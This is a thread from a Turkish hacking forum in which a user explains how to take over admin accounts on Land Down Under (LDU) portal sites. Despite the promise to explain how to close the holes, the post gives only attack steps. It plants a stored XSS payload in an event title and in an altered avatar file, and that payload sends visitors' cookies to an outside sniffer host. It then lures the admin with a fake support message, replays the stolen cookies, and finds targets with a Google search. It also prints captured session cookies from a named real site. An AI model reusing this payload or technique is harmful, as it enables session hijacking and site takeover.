İPUCU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

LDU Portal Hack

10-12-2006 11:47
#1
fataleror - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
12/2006
Mesajlar:
246
Teşekkür (Etti):
0
Teşekkür (Aldı):
132
Konular:
136
Ticaret:
(0) %
LDU Portal (Land Down Under) Çok Önemli 2 tane acık ve nasıl kapatacagınızı anlatacagım..
Gerekli dokumanlar:1) Cookie editor.
2) Bilgisayar
3) İnternet Baglantısı
1.Acık.. Events acıgı.. : Şimdi üye oldugumuz siteye etkinlikler(Hack sitelerinde hacked sites) Ekleyecegiz..
Etkinlik ekle diyoruz ve konu kısmına bu kodu yerleştiriyoruz.
Kod:
**********img = new Image(); img.src = "<A href="http://antichat.ru/cgi-bin/s.jpg?"+********.cookie;</script">http://antichat.ru/cgi-bin/s.jpg?"+********.cookie;</script>
Artık sadece adminin events kısmına bakması yeterli..
Baktıgı an cookileri bizdedir..Onaylamasına gerek yok bakması yeterli bizim için..Daha sonra http://antichat.ru/sniff/log.php
adresine girip adminin gelen cookileri alıyoruz ve cookie editor ile kendi cookimiz ile degiştiriyorz.Sayfayı yenile diyoruz ..AAAAAAA admin panelindeyiz
2.acık: Avatar cookie koyma..
Şimdi arkadaşlar bir ldu siteye üye oluyoruz.Üye olduktan sonra siteye eger avatar upload varsa o site bizim.Önce kendimize bir avatar seciyoruz.Avatarı notdefteri ile acıp içinki kodları Şu kodlarla degiştiriyorsunuz..
Kod:
**********img = new Image(); img.src = "<A href="http://antichat.ru/cgi-bin/s.jpg?"+********.cookie;</script">http://antichat.ru/cgi-bin/s.jpg?"+********.cookie;</script>

Daha sonra bu kodlarını degiştirdigimiz avatarı siteye upload ediyoruz.Şimdi geldi adminin cookilerni calmaya.Admini bir pm atıyoruz.'Admin bey benim avatarımda bir sorun var diyorsunuz avatarınız linkini veriyorsunuz ve admin mutlaka linke tıklar bakar.. bu adrese adminin cookileri ip adresi ie bilgileri hemen geliyor.http://antichat.ru/sniff/log.php adresinden gelen adminin cookilerini cookie editor ile kendi cookilerini ile degiştiriyorsunuz ve sayfayı yenile dediniz bi baktınız admin panelindesiniz...Bu basit bir acık...

Örnek bu acık sayesinde gelen cookiler..biltec.org admin cookileri alınmıştır ama Türk sitesi oldugu için hacklenmemiştir.Bu sitenin cookilerinin alınma sebebi ise googlede ilk sayfada cıkması

Kod:
REFERER=http://biltec.org/admin.php?m=queue_events
QUERY=dbx-post****=grabit=0-*1-*2-*3-*4-*5-*6-&advancedstuff=0-*1-*2-; LDUC=NzE1Ol86NjMzNTExOGI0YjlmMDFiOGE0MTk1Mjk3YmIyM 2U2ZDM6XzpCaUxUZUM=; PHPSESSID=7fdf312cd4073d866ca2798357a05175
AGENT=Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1
(Lütfen md5'i kırmaya calışmayınız)

2 ANLATTIGIM ACIK BASİTTİR AMA BİRİNCİSİ %100 işe yarar..
Hadi kolay gelsin.Bir kaç gün içinde size video olarak anlatacagım
Googlede aratmak için powered by ldu yazmanız kafidir
Kullanıcı İmzası
Cahille Girdiğim Her Kavgada Kaybetmişimdir

22-05-2008 20:13
#2
dj_ahmed - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2007
Mesajlar:
207
Teşekkür (Etti):
40
Teşekkür (Aldı):
8
Konular:
36
Ticaret:
(0) %
saol kardes 10x

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı